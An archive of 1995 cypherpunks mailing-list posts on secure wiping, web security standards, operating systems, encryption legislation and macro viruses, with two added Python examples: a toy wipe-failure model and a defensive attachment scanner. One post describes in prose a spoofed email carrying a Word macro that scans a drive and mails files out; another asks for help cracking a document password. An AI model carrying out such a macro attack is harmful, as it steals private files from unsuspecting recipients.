Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Thu, 20 Jul 95 21:07:15 PDT
To: cypherpunks@toad.com
Subject: Superwipe
Message-ID: <199507210601.BAA25559@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks,

   This is mostly an old post that Monty Harder sent me concerning my
program Superwipe. I got his ok to post it to Cypherpunks so that it
would stimulate debate on my program.

   In addition to the original problem of wiping compressed sectors, I
have found a second problem: with caching software and the now
ubiquitous several hundred k hardware ram caches, it is about
impossible to do multiple wipes on sectors. Anyone else got any ideas?

GJ>    A number of problems have cropped up though. It will not handle
GJ> compressed disks yet. SUPERWIPE writes all 0's or all 1's & you know
GJ> what a compressed disk driver will do with them. The driver would

>  Since most hard drives use a form of RLL encoding at the hardware
>level, the bits don't all go in the same places every time. For maximum
>security, you would need to write 00h through FFh, but a fair compromise
>would be five passes: 00,55,AA,FF, and finally the string

>               'SUPERWIPEd for your protection.',BEL,CR,LF

>(gotta get in that plug) followed by random garbage.

GJ> crush them down to a few bytes at the beginning of the file & the rest
GJ> of the file would not be touched.
GJ>
GJ>    I have decided that I can solve that problem by writing a random
GJ> number generator function and filling the file with non-compressible
GJ> random numbers.

>  Nope. Won't work. Suppose FUBAR.DAT is currently compressed at 7:16
>(DoubleSpace, Stacker, et al. typically use 16 sectors per cluster).
>When the request to write the random cluster, now noncompressible, comes
>along, the driver will find =another= run of 16 contiguous sectors to
>hold the data, and free the old one (DS has no choice about this, but
>Stacker can split clusters into noncontiguous areas if necessary. I
>believe it "prefers" contiguous blocks, however.  IANASU.)

>  Your best bet is to put right in your docs a warning that compressed
>drives make reliable operation of SUPERWIPE impossible to assure, and
>that sensitive data are best kept on uncompressed drives.


GJ>    Also, I am thinking of putting SUPERWIPE into the public domain.
GJ> I would use the privacy functions presently in it and also include a
GJ> few more privacy functions. If I put it into the public domain, then
GJ> I will have to distribute source code. This could make me more vulnerable

>  Why? Distribute executables, assert your copyright, and include a
>GNU-type freeware license or whatever your heart desires. That would be
>the international release. If you want, put up your source code with the
>usual export controls, separately.
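
Added example (not part of the original posts, and not SUPERWIPE, DoubleSpace or Stacker code): a toy Python model of the two failure modes discussed above, where constant-fill passes are crushed into the head of the old run and an incompressible pass is written to a fresh run while the old sectors are merely freed. The ToyCompressedVolume driver, its first-fit allocator, zlib as the compressor and the sample secret are all assumptions constructed for illustration.

```python
import random
import zlib

SECTOR = 512
CLUSTER = 16 * SECTOR            # 16 sectors per cluster, as in the post


class ToyCompressedVolume:
    """Hypothetical compressing driver (an assumption, not real driver code)."""

    def __init__(self, sectors=64):
        self.disk = bytearray(sectors * SECTOR)   # raw media, initially zeroed
        self.used = [False] * sectors             # allocation bitmap
        self.files = {}                           # name -> (first sector, sector count)

    def _allocate(self, count):
        # First-fit search for a contiguous run of free sectors.
        for start in range(len(self.used) - count + 1):
            if not any(self.used[start:start + count]):
                self.used[start:start + count] = [True] * count
                return start
        raise OSError("volume full")

    def _release(self, start, count):
        # Freeing only clears the bitmap; the bytes stay on the media.
        self.used[start:start + count] = [False] * count

    def write_cluster(self, name, data):
        if len(data) != CLUSTER:
            raise ValueError("this toy driver writes whole clusters only")
        packed = zlib.compress(data)
        blob = packed if len(packed) < len(data) else data   # raw if incompressible
        need = -(-len(blob) // SECTOR)                       # sectors required (ceiling)
        old = self.files.get(name)
        if old and need <= old[1]:
            # New data fits: rewrite the head of the old run, release the tail.
            start = old[0]
            self._release(start + need, old[1] - need)
        else:
            # New data is bigger: find another run first, then free the old one.
            start = self._allocate(need)
            if old:
                self._release(*old)
        self.disk[start * SECTOR:start * SECTOR + len(blob)] = blob
        self.files[name] = (start, need)

    def raw(self, start, count):
        return bytes(self.disk[start * SECTOR:(start + count) * SECTOR])


# Constructed passes: the four constant fills from the post, and one random pass.
PATTERN_PASSES = [bytes([b]) * CLUSTER for b in (0x00, 0x55, 0xAA, 0xFF)]


def random_pass(seed=42):
    rng = random.Random(seed)
    return [bytes(rng.getrandbits(8) for _ in range(CLUSTER))]


def wipe_and_measure(passes):
    """Store a secret, overwrite it with each pass, then inspect the raw media.

    Returns (sectors in the original run, sectors of that run left
    byte-for-byte intact, whether the secret decompresses from them).
    """
    rng = random.Random(1995)
    # Constructed secret: partly incompressible so it occupies several sectors.
    secret = bytes(rng.getrandbits(8) for _ in range(3200)) + b"SECRET " * 713 + b"!"
    vol = ToyCompressedVolume()
    vol.write_cluster("FUBAR.DAT", secret)
    start, count = vol.files["FUBAR.DAT"]
    before = vol.raw(start, count)
    for fill in passes:
        vol.write_cluster("FUBAR.DAT", fill)
    after = vol.raw(start, count)
    surviving = sum(before[i:i + SECTOR] == after[i:i + SECTOR]
                    for i in range(0, len(before), SECTOR))
    try:
        recovered = zlib.decompressobj().decompress(after) == secret
    except zlib.error:
        recovered = False
    return count, surviving, recovered


if __name__ == "__main__":
    for label, passes in (("00/55/AA/FF fills", PATTERN_PASSES),
                          ("random fill", random_pass())):
        run, left, ok = wipe_and_measure(passes)
        print(f"{label}: {left} of {run} original sectors intact, "
              f"secret recoverable: {ok}")
```

In this model the constant fills damage only the first sector of the old run, and the random fill leaves every original sector intact, which is why the advice above is to keep sensitive data on uncompressed drives.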






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 20 Jul 95 20:46:22 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win
Message-ID: <v02130506ac34c46ae1f0@hal9001.dialup.access.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:39 7/20/95, Timothy C. May wrote:
>To state an obvious non-crypto use of such "modules," why do all major word
>processing and page layout apps have their own "dictionaries"? Why do I
>have to train the dictionaries of Word, Nisus, FrameMaker, MORE, etc.? That
>there have not been "dictionary modules," for many and sundry reasons, is
>telling. (Before anyone mentions it, one can on the Mac use things like
>"Thunder" instead of the local dictionaries...this is not the same as a
>module usable by all programs, but instead is a user choice to bypass the
>local dictionaries. We could quibble for hours about whether this is in
>fact a universal module or not.


Since the support that Thunder 7 provides (with Wordprocessing and
Wordprocessing-Like Programs that it supports) is indistinguishable from
that provided by each program's integrated SpellChecker (along with T7
providing a common set of "extra" User-Extendable Dictionaries as well as a
Glossary/Mis-Spelling/Words-to-Replace Dictionary [ie: Pre-Prime the list
of incorrectly spelled words for "Replace All" so the user's personal
misspellings are automatically corrected without any interaction on his/her
part]), I think the ball is initially in the court of those who claim it is
not a universal module (admittedly only for those WPs it supports) to
explain why it does not function as one would function if it existed.

IMHO - T7 is walking and quacking like a Duck so I think calling it a
"Duck" (as a first approximation) is not an unjustified action <g>.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Thu, 20 Jul 95 21:56:21 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: And another thing...
In-Reply-To: <199507202233.AA15359@tyrell.net>
Message-ID: <Pine.BSI.3.91.950720234916.16811B-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



From the tiny marketer level,
it's because it will spell the death of Ticketmaster.
We can show you where your seat is in the stadia or arena.
We can then sell you the ticket on a secure socket.
And then let you print the ticket on your own printer.

The economics of this are fantastic.

Love Always,

Carol Anne

On Thu, 20 Jul 1995, Phil Fraering asked with insight:

> Why is Java the next hot thing instead of Telescript?
> 

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ekr@eit.COM (Eric Rescorla)
Date: Fri, 21 Jul 95 01:44:23 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <9507210844.AA17250@eitech.eit.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney writes:
>From: Adam Shostack <adam@bwh.harvard.edu>
>> 	Actually, it also supports Kerberos (not relevant to most of
>> us), and PGP messaging.  Although a KCA would be needed before anything
>> useful came of the PGP support, at least it's there.
>
>It appears that support for PGP messaging has been removed from the
>July 1995 SHTTP draft.  So it's X.500 all the way.
><URL:http://info.internet.isi.edu/in-drafts/files/draft-ietf-wts-shttp-00.txt>

Well, X.509 for now. The Eastlake-Kaufman DNS Security work
(draft-ietf-dnssec-secext-04.txt) plus MOSS (draft-ietf-pem-mime-08.txt
--now proposed standard, awaiting an RFC number) promise to give us
a non-X.509 certification structure for the Internet. S-HTTP explicitly
looks to this work to free us from X.500. 

Note that this only marginally improves the situation, however,
since what you really want is commercial-grade certification,
and you still can't issue RSA certificates, whatever the
format, without licensing from RSADSI. This promises to be
something of an issue in the future.

-Ekr







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: piff@world-net.sct.fr
Date: Thu, 20 Jul 95 17:16:47 PDT
To: cypherpunks@toad.com
Subject: Lotus AmiPro doc
Message-ID: <199507210017.CAA23302@world-net.sct.fr>
MIME-Version: 1.0
Content-Type: text/plain



I was recommended to you by a friend who told me that you may be able to
help me decrypt or suck the password out of a LotusAmiPro doc. 
 
Your help would be greatly appreciated.  

Please email me back as soon as you can find the time.  Thank you.
  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C.CREUTZIG@BIONIC.zerberus.de (Christopher Creutzig)
Date: Sat, 22 Jul 95 17:38:21 PDT
To: cypherpunks@toad.com
Subject: Re: Non-US mixmaster sites
In-Reply-To: <4VHP8c1w165w@vox.xs4all.nl>
Message-ID: <zp7eedaB3Q7zZ16d@bionic02.bionic.zerberus.de>
MIME-Version: 1.0
Content-Type: text/plain


Ad>     remailer@replay.com
Ad>     remailer@flame.alias.net
Ad>     remailer@utopia.hacktic.nl

mixmaster@bi-node.zerberus.de is up and running.

---
Christopher Creutzig                | c.creutzig@bionic.zerberus.de
PGP-encrypted messages preferred -- use envelopes!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Mon, 21 Aug 95 01:19:48 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
In-Reply-To: <ac5d434c030210047d03@[205.199.118.202]>
Message-ID: <mG1Dw4NQnM/L084yn@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


In article <ac5d434c030210047d03@[205.199.118.202]>,
tcmay@got.net (Timothy C. May) wrote:
}At 8:52 PM 8/20/95, Hadmut Danisch wrote:

}>These transponders have already been used for many years. They inject
}>them in pigs and cows to identify them. And some car manufacturers
}>put them into the ignition keys as theft protection.
}
}The subcutaneous animal things are only detectable at very short ranges.

}Typically, a vet (animal doctor) uses a handheld wand to pick up the
}signal. Useful for tracking pets, farm animals, etc.

Yep, and it uses a nine digit number, what convenience.

}There has so far been no known uses of this on humans, at least as a matter
}of routine. Possibly some developers have tried injecting themselves, for
}the usual reasons.

Nope, those are in the works, well biotelemetry devices are.

}Implausible. The theft detectors are not picking up specific transponders,
}just the "on" or "off" state of the things attached to clothing, books,
}CDs, etc. (I say "things" because some of them are strips inserted in
}books, some are tag-like things clamped to clothing, etc.)

They'll need to change those, kids are having too much fun attaching them
to the innocent before they leave the store..

}Again, the infrastructure is lacking. The simple detectors in stores would
}have to be upgraded to track more sophisticated transponders. The stores
}would have to cooperate, etc. Implausible.

The infrastructure is in place for the implantable short range devices all
that is needed is a reader at a credit terminal. No, I don't see this as
being implemented.

Check out the patent office for some interesting new devices in the works.
One has a wide bandwidth outgoing channel and a low bandwidth incoming
control channel. Range on the outgoing channel is 300 yards. This is
through the skin.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Fri, 21 Jul 95 01:29:23 PDT
To: cypherpunks@toad.com
Subject: Re: Java (was Netscape: the big win) (fwd)
Message-ID: <Pine.SUN.3.91.950721032639.5753C-100000@bambam.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 20 Jul 1995, Bill Stewart wrote:

> At 06:04 PM 7/20/95 -0800, Douglas Barnes wrote:
> >Uh, no, this is a standalone Java program (includes interpreter,
> >language library, etc.)
> >
> >Applets are treated by a browser in the same way that a GIF is treated
> >(more or less); the browser may have to grab more memory to take in
> >a big one, but that memory can be reclaimed when the user moves on to
> >a new page.
> >
> >Applets run as a thread within a multi-threaded browser, they don't
> >have their own processes, etc.
> 
> Good.  Any guesses how big a basic "Hello, World" applet would be?
> Maybe 10K?
> #                                Thanks;  Bill
> # Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
 
While true certain small programs may be larger in size; the difference
will decrease as the programs grow in complexity. With the natural strong
point of true object oriented code reusing more code as the program grows
the difference may still measurably be there but will be hardly noticeable.

<IMHO> it is the future of the net  

I see this being the last step that gets corporations on the net ...  making
money in a *relatively* secure way ... good or bad is another thread which I
don't want to be a part of.


-Mike

**************************************************************************
*                                                                        * 
*       Mike Bailey                     (hm)214-252-3915                 * 
*       AT&T Capital Corporation.       (wk)214-456-4510                 *
*       email bailey@computek.net       host bambam.computek.net         *
*                                                                        *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*               http://www.computek.net/public/bailey/                   *
**************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 21 Jul 95 01:02:16 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: It had to happen...
Message-ID: <v02130500ac34ed849b30@[165.254.158.4]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:41 7/20/95, Douglas Barnes wrote:
>Has anyone caught this yet? From "No Such Agency" to having
>their own Web page... wow.
>
>http://www.nsa.gov:8080/

They've been on the net for years. They were dockmaster (I do not remember
the domain) and were mentioned as such in Cuckoo's Egg. The address is
probably being run by the same section as dockmaster is/was (RTM Sr's
Group).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 21 Jul 95 01:16:58 PDT
To: cypherpunks@toad.com
Subject: Re: S/MIME and the Future of Netscape
In-Reply-To: <ac33d9e705021004c7d6@[205.199.118.202]>
Message-ID: <9507210816.AA18815@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



> With regard to SSL and Netscape not being open to outside developers,
> several leading e-mail outfits, including Qualcomm, Netscape, Frontier,
> etc., are working on an interoperable secure e-mail standard called
> "Secure/MIME," or "S/MIME."

Huh? Don't know about MOSS? It's now hit Proposed Standard....

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 21 Jul 95 02:36:53 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Netscape the Big Win
In-Reply-To: <ac33f977080210043230@[205.199.118.202]>
Message-ID: <9507210836.AA21665@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> one way or the other, and will join the rest of the world (apparently) in
> using Netscape.

This from "Mr. Ascii" as of six months ago. Everyone remember when Tim
was flaming MIME and the rest? Well, Netscape was out back then, too.

> And yes, I am "marginalizing" the work that anyone does on "fringe"
> projects like Linux, which will likely always remain in the ghetto
> of Unix hackers who want a cheap Unix running on their cheap 486
> boxes...it just ain't gonna take over inside corporations or amongst
> the many folks like me.

I apologise for doing my IPSP work on a marginal operating system like
BSD Unix. Were I a truly non-marginalized person, I'd have realized
that Novell Netware and Appletalk were the internetworking
technologies of the future. I would suggest that you get rid of your
web browser while you can -- it was descended from code written for
Unix, that marginalized operating system. By the way, I understand
Netscape does their development with marginalized machines.

> That Qualcomm (Eudora), Netscape, Frontier, Microsoft, Lotus, and others
> are working on an interoperable "Secure/MIME" should be encouraging.

I'm glad to see you've not been paying attention to the IETF work on
MOSS. After all, we are a marginalized group -- we only built the
Internet, you know.

Perry, writing from the marginalized IETF meeting in Stockholm, where
the nowhere people define standards no one uses.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 21 Jul 95 01:40:45 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
In-Reply-To: <ac3402ec0a0210046af5@[205.199.118.202]>
Message-ID: <9507210840.AA22286@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> I am sorry that some folks heavily committed to the Linux route, or to
> Emacs, or to GNU/FSF, or to other approaches feel that their work is
> technically superior and deserves to be as popular as Netscape and similar
> approaches, but reality is reality.

I assume everyone but Tim knows about Netscape's origins in Mosaic,
and understands thus why his comments above are so amusing.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 21 Jul 95 03:00:40 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: "Cypherpunks Write Code" as a Putdown
In-Reply-To: <ac3406e80c0210045a87@[205.199.118.202]>
Message-ID: <9507210900.AA25179@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> In my posting on why I think Netscape and related operating environments
> represent the likeliest targets for widespread crypto use (the "big win" I
> used in my title), I did not whine that others ought to write code for me.
> I said that this is where users were going in massive numbers.
> 
> Take it or leave it, as an analysis, but the "try writing some code" is a
> meaningless insult.

Some of us have spent the last several days not getting sleep and
going to meetings here in Stockholm -- defining security standards,
talking to Microsoft people about IPSP integration into Win '95 and
Windows NT, recruiting people to work on the project we have to make
sure that the IETF meeting in Dallas in a few months will have IPSP
security. We hope to have the whole infrastructure of the internet
encrypted within a year or two. I believe that between IPSP for the
links and MOSS (and SHTTP using MOSS for document security) we should
have the whole thing wrapped up in a couple of years. Problems still
to solve include security for the internet's routing protocols,
protection against denial of service attacks, etc.

Remailers and the like are still worthwhile areas for effort, of
course, but I think of those as applications of the secure
infrastructure.

Those people who would rather work than talk are invited to start
reading the internet drafts (some of which are soon to be RFCs) and
help out with the effort. I suspect that a big push from about 25
people could manage to implement just about everything we want and then
we could go on and live the rest of our lives.

There is a lot of real hard work to do in the next year or two and I
invite members of the community to quit waiting for the CryptoRapture
in which the X-Ists bring down the cypher systems of the future, and
help us actually do the job so that we'll see this stuff in our
lifetime.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 21 Jul 95 02:19:30 PDT
To: gjeffers@socketis.net (Gary Jeffers)
Subject: Re: DOVE/Red Mercury doom U.S. Super State?
In-Reply-To: <199507202345.SAA24056@mail.socketis.net>
Message-ID: <9507210919.AA27922@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



The Wall Street Journal had a fascinating article on the scams about
"Red Mercury" in the former Soviet Union -- suffice it to say the
whole thing is bogus.

.pm

Gary Jeffers writes:
>             DOVE/Red Mercury dooms U.S Super State?
> 
>    The first part of this post deals with Red Mercury. The
> remainder
> deals generally with cheap weapons of mass destruction and




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 21 Jul 95 02:31:56 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: It had to happen...
In-Reply-To: <v02120d3eac3499ebec14@[199.2.22.120]>
Message-ID: <9507210931.AA29736@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Douglas Barnes writes:
> Has anyone caught this yet? From "No Such Agency" to having
> their own Web page... wow.

They also have a Fortezza based web security system. One of their guys
was discussing some of that here at IETF.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Fri, 21 Jul 95 05:09:18 PDT
To: rah@shipwright.com
Subject: Netscape the Big Win(dows)
In-Reply-To: <v02120d00ac34bcc434d6@[199.0.65.105]>
Message-ID: <199507211204.AA19453@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Tell us about it in 6 months, Tim, when you've grown out of Netscape. You
   sound like someone who's totally enamored with their "-works" app. Most
   people end up using more specialized apps when they hit the wall with
   something which won't get all those "general purposes" taken care of...

While I understand what Tim's been saying about integrated apps, since
my Dad continues to use Microsoft Works instead of Wordperfect which is
much better, my Dad is limiting himself in ways that ultimately Tim isn't
going to accept.

Remember, he also raved about the Newton for the first couple of months.
I wonder if he's replaced the one he sold yet.

Phil






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Fri, 21 Jul 95 05:23:04 PDT
To: cypherpunks@toad.com
Subject: The OS wars and DOOM...
Message-ID: <199507211218.AA20295@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



This is a point I want to bring up regarding the current
OS war being waged on this group.

Apps have migrated from Unix to the Mac and the PC before in
the past. In the further past, this has included curses and
other-types-of-text-control packages such as PC versions of
Emacs and nethack and the like.

Of course, this was not done with graphical programs; everyone knows
that graphics isn't Unix's strong suit, and what it has is so different
from the PC, etc., blah, blah,...

Except that for the past two or three years, it's been WRONG.

One of the hottest games on the PC, DOOM, was originally written in
Nextstep (a Unix variant, and a ghetto even amidst the "ghetto" of
Unix) and then ported to the PC.

I don't know which Unix environment they're using in the "master"
development effort before porting to other environments today.

Given that games usually program close to the hardware, and are 
therefore the _most_ difficult things to port from one environment
to another, it really makes one wonder why Excel isn't out for
(for example) Linux or BSD today.

Then again, SCO WordPerfect is...

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Mon, 21 Aug 95 07:24:28 PDT
To: cypherpunks@toad.com
Subject: Re: Legality of suverting computational cycles via Microsoft
Message-ID: <199508211423.HAA08515@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


>Does anybody here know if it is illegal to get unwitting users to download
>benign viruses via MSN?
>
>Doesn't this sort of hole, by its very nature, make it trivial for people
>to violate Europe's future electronic privacy laws? (despite Microsoft's
>guarantee that MSN would follow those rules.)
>
>JWS
>

Yes, the whole MSN virus thing is quite interesting from a privacy standpoint.  About 9 months ago (after I'd left Microsoft) I was evaluating the security risks of viruses that could be embedded in Word and Excel documents.  It is actually quite trivial to develop a virus or Trojan-horse with macro BASIC that is completely transparent to the user.  Once the document is opened, the code executes and does its thing. 

Many organizations use e-mail software that supports attaching a file to an e-mail message.  You double click the file icon, it runs the creator application (i.e. Word, Excel), and loads the document.  Everyone at Microsoft uses MS Mail.  An interesting scenario I proposed would be to send e-mail to Bill Gates (anonymously or with a spoofed address) with the text body reading something like "Bill, here's a way to get more marketshare away from Novell.  Read the attached document."  He'd obviously double click the file icon, which would have some real data in it to make it look legitimate.  However, when the document opened, he would have unwittingly executed a macro that scanned his hard drive and e-mailed the directory contents or an interesting looking file or two elsewhere.

As e-mail within MSN supports this type of object/file embedding, there are not only risks from destructive viruses but also potential attacks on your privacy (no, not the MSN online registration thing, but a targeted attack by an individual/organization).

Concluding note:  When I was at MS, the saying "Eat your own dog food" was popular (akin to "some things come back to haunt you").  Last week a friend told me the company was being plagued with a non-destructive version of a Word macro-virus.  Let's say in the future someone "gets hurt" because of MSN's embedding feature and decides to sue Microsoft.  It will be interesting to see the company's response when they knew that a security flaw existed internally, but did nothing to resolve it externally.

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?
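
A defender-side illustration of the attachment risk described in the message above, added here as an example and not part of the original post: a mail-gateway check that walks a message's attachments and flags macro-capable Office files by content rather than by file name. It goes beyond the 1995-era formats by also covering zip-based OOXML files (macros live in a vbaProject.bin part) alongside the legacy OLE2 container; the function names and the sample message are constructed for the example.

```python
import io
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage

# Signature of the legacy OLE2 compound file used by binary .doc/.xls files.
OLE2_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")


def classify_attachment(data: bytes) -> str:
    """Classify attachment bytes by content, ignoring the file name.

    'macro'      - zip-based Office file that carries a VBA project
    'legacy-ole' - binary Office container; macros cannot be ruled out
                   without parsing it, so treat it as macro-capable
    'clean'      - neither of the above
    """
    if data.startswith(OLE2_MAGIC):
        return "legacy-ole"
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = [n.lower() for n in zf.namelist()]
        if any(n.endswith("vbaproject.bin") for n in names):
            return "macro"
    return "clean"


def scan_message(raw: bytes):
    """Return [(filename, verdict)] for every attachment that is not clean."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        verdict = classify_attachment(data)
        if verdict != "clean":
            findings.append((part.get_filename(), verdict))
    return findings


def build_sample() -> bytes:
    """Constructed test message: one macro-bearing file with an innocent
    .docx name, one legacy binary document, one plain text attachment."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        # Placeholder bytes, not a real VBA project.
        zf.writestr("word/vbaProject.bin", b"\x00placeholder")

    msg = EmailMessage()
    msg["From"] = "sender@example.com"
    msg["To"] = "recipient@example.com"
    msg["Subject"] = "Read the attached document"
    msg.set_content("See attachment.")
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="octet-stream", filename="plan.docx")
    msg.add_attachment(OLE2_MAGIC + b"\x00" * 64, maintype="application",
                       subtype="msword", filename="notes.doc")
    msg.add_attachment("plain text notes\n", filename="readme.txt")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, verdict in scan_message(build_sample()):
        print(f"{name}: {verdict}")
```

A gateway would quarantine or strip flagged parts before delivery, so the document never reaches the double-click step the message describes.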

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Fri, 21 Jul 95 05:43:46 PDT
To: <cypherpunks@toad.com
Subject: Re: DOVE/Red Mercury doom U.S. Super State?
Message-ID: <9507211243.AA25591@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>             DOVE/Red Mercury dooms U.S Super State?

UNALTERED Dissemination of This Important Information is 
ENCOURAGED :-> (or words to that effect - anyone have the
canonical form available?)

>& Finally: In the old Feudal days, wars weren't so bad. The 
>nobility would fight while the peasants watched nearby & 
>cheered the sport.

If this is an example of the depth of your research, then we
certainly don't have to worry about anything else in your post.
The peasants were economic assets, and their destruction was
regarded as a standard practice of war. Try reading Barbara
Tuchman's 'A Distant Mirror: The Calamitous 14th century.'

[I must admit, however, that the idea of Bush and Saddam Hussein
having it out has a certain appeal - battleaxes in a blacked
out cellar sounds appropriate.]


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Fri, 21 Jul 95 09:51:45 PDT
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <199507201536.LAA05105@eff.org>
Message-ID: <300f5b5a.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


Many of the leaders of the major net civil liberties organizations have made
statements concerning SB 974. They seem to agree that no action alert
or coalition on SB 974 should be formed at this time.

Some of the statements about SB 974.

"Silly Bill"
"not going anywhere"
"subcommittee hearing not set yet"
"premature"
"inflammatory distraction"
"campaign is unlikely to be successful"
"the bill is doomed"

I remain concerned about this bill and am not satisfied with the response
to this bill.

Exon was a silly bill, but it passed the Senate by a wide margin.
How can a campaign to stop the bill not be successful if the bill
is not going anywhere? Perhaps we need to have a success to
gain momentum. The people on the subcommittee are going to be very
important as the rest of the Senate will consider them to be the "experts".
Since the net is esoteric to most people there will be a strong tendency
to depend on the "experts". The best time to persuade these "experts"
will be before they make any public statements about the bill in the
subcommittee hearings and their positions are locked by pride not 
wanting to publicly change their positions. Thus we should be contacting
these people now, and we may have a chance to nip SB 974 in the bud.

By the way, what subcommittee was it sent to? I understand it was
one of the subcommittees of Judiciary but no one said which one.
Because there is no action alert, people do not know what States 
have the senators on the sub-committee. People from these States
are the ones that should be especially encouraged to contact their Senators.

In any case, it is clear that if any significant action on SB 974 will
be taken at this time, the CYPHERPUNKS will have to do it. The major
net civil liberties organizations have bowed out for now.

Are there any cypherpunks out there who can help? Perhaps someone
has writing skills that would be willing to write an action alert?
Perhaps someone knows which subcommittee it was sent to?
Since SB 974 hobbles our right to use encryption, the cypherpunks
should be especially interested in opposing it.

-- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Fri, 21 Jul 95 09:09:53 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <ac351dc10f021004de07@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:42 AM 7/21/95, Lucky Green wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
